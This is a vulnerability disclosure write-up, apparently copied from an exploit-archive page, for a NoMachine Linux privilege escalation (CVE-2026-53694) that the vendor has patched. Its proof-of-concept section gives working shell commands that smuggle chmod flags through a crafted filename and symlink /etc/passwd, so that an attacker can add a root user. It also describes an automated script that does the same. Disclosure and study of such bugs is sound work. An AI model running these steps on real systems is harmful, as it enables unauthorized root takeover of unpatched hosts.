Share
## https://sploitus.com/exploit?id=8596479B-1EDC-5D58-82E1-664368340586
# CVE-2026-53694: NoMachine Local Privilege Escalation via Argument Injection
![CVE](https://img.shields.io/badge/CVE-2026--53694-red)
![Status](https://img.shields.io/badge/Status-Patched-brightgreen)
![Target](https://img.shields.io/badge/Target-NoMachine_Linux-blue)
![Language](https://img.shields.io/badge/Language-Python-yellow)

## Overview

This repository contains the write-up and Proof of Concept (PoC) for CVE-2026-53694, a Local Privilege Escalation (LPE) vulnerability in NoMachine for Linux.

Due to improper neutralization of argument delimiters in the `nxchmod.sh` script, a local unprivileged user can inject arguments into a system command executed as `root`. By combining this argument injection with a symbolic link, an attacker can overwrite critical system files (such as `/etc/passwd`) and escalate their privileges to root.

This vulnerability has been fully patched by the vendor.

## The Discovery Process

Finding this vulnerability was a process of trial, error, and a late-night realization. Here is how the discovery unfolded:

1. **Observing the Target:** I noticed that the `/usr/NX/scripts/restricted/nxchmod.sh` script was being executed periodically by the root user to manage permissions in specific directories.
2. **Initial Idea (The Dead End):** I saw that the script was applying `chmod a+rw` to files. I thought: *If I control the destination, can I use a symlink to make `/etc/passwd` writable?* I tested a standard symlink (`ln -s /etc/passwd /tmp/asdf`), but it failed. The Linux sticky bit on directories like `/tmp` prevents the root user from blindly following a symlink created by another user.
3. **The Breakthrough:** While reviewing the script execution later, I noticed how the command was being constructed: `${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}`. The script was taking the literal file name and passing it directly to `chmod`.
4. **Command Injection via Filename:** I realized I could create a file with spaces and flags in its name. I created a file named `X1234 -R -L`. When the script ran, the `chmod` command expanded this into arguments rather than a single file path.
5. **Bypassing the Sticky Bit:** By injecting the `-L` (follow symlinks) and `-R` (recursive) flags into the `chmod` command via the file name, I forced the `chmod` binary itself to resolve and follow the symlink I created in the directory, completely bypassing the sticky bit protection.
6. **Achieving LPE:** Once `/etc/passwd` was made writable (`a+rw`), I could simply append a new root user to the file and `su` into it.

## Technical Analysis

The vulnerability stems from how NoMachine handles permissions for X11/Wayland sockets. The script `nxchmod.sh` is spawned by the `nxserver.bin` daemon running as root.

The vulnerable execution looks like this:

```bash
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}
```

If an attacker creates a directory structure and a file named `X1234 -R -L`, the resulting command executed by root becomes:
`/bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L`

When a symlink pointing to `/etc/passwd` is placed inside the `X1234` directory, the injected `-R` and `-L` arguments force `chmod` to recursively follow the symlink and grant global read/write permissions to the target file.

## Requirements for Exploitation

For this exploit to work, the target system must meet the following conditions:

* The OS must be using Wayland (not X11).
* Xwayland must be active.
* A graphical session must be running (the login screen is sufficient).

## Proof of Concept

You can reproduce this vulnerability either manually using shell commands or automatically using the provided Python script.

### Method 1: Manual Execution (Shell)

Navigate to `/tmp/.X11-unix/` and execute the following commands to create the malicious directory structure.

```bash
cd /tmp/.X11-unix/

# 1. Exploitation setup
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# Wait for nxchmod.sh to execute (can take up to 60 seconds).
# Verify the permissions of /etc/passwd have changed to -rw-rw-rw-
# You can now edit /etc/passwd to add a root user.
```

Once you have verified the vulnerability and escalated privileges, run the following cleanup commands to restore system stability and remove artifacts:

```bash
# 2. Cleanup
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd
```

### Method 2: Automated Exploit

A full automated exploit is provided in `poc.py`. This script verifies the Wayland requirements, sets up the symlink, waits for the `nxchmod.sh` execution cycle and injects a new root user (`gg`) into `/etc/passwd`

To run the exploit:

```bash
python3 poc.py
```

## Remediation

This vulnerability has been addressed by NoMachine. Users should update to the following versions or later:

* NoMachine 9.5.7
* NoMachine 8.23.2

## Timeline

* **2026-04-20:** Vulnerability reported to vendor.
* **2026-04-23:** Vendor confirmed the vulnerability and agreed to coordinated disclosure.
* **2026-05-07:** Vendor released patched versions (9.5.7 and 8.23.2) and published Trouble Report TR04X11802.
* **2026-06-10:** CVE-2026-53694 published to NVD. (The official MITRE record is currently pending full analysis and credit updates (last checked 2026-07-01))

## References

* [NoMachine Trouble Report TR04X11802](https://kb.nomachine.com/TR04X11802)
* [NoMachine Software Update SU05X00274](https://kb.nomachine.com/SU05X00274)
* [NoMachine Software Update SU05X00275](https://kb.nomachine.com/SU05X00275)
* [NVD - CVE-2026-53694](https://nvd.nist.gov/vuln/detail/CVE-2026-53694)